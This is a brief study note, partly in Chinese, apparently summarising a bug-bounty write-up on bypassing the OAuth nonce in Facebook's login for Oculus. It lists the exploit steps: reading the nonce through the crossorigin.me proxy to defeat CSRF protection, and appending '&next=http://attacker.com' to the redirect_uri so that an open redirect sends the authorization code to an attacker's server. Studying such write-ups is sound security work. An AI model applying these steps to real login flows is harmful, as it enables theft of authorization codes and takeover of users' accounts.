Bypass OAuth nonce and steal oculus response code

Introduction

Authorization request:

https://www.facebook.com/v2.8/dialog/oauth?app_id=1517832211847102&client_id=1517832211847102&domain=auth.oculus.com&locale=en_GB&origin=1&redirect_uri=https://auth.oculus.com/login/&response_type=code&sdk=joey&version=v2.8&nonce=AXRr8eBAjDTBkzQ7&state=d916afa3-3dc1-bab7-fc9d-3c8f44bf757

Bypass CSRF,让victim发送以上请求,当req authorized之后,fb返回authorization_code到定义的rediect_uri, 然后要bypass redirect_uri的检查,将authorization_code 发送到黑客的server.

Exploit

  1. Bypass CSRF
    1a. 利用https://crossorigin.me/读取nonce
  2. Bypass redirect_uri
    2a. 在rediret_uri后加入&next=http://attacker.com

NIN: 2a - 需要redirect_uri中有open redirect的漏洞

Ref

Bypass OAuth nonce and steal oculus response code – Lokesh Kumar – Medium

Show Comments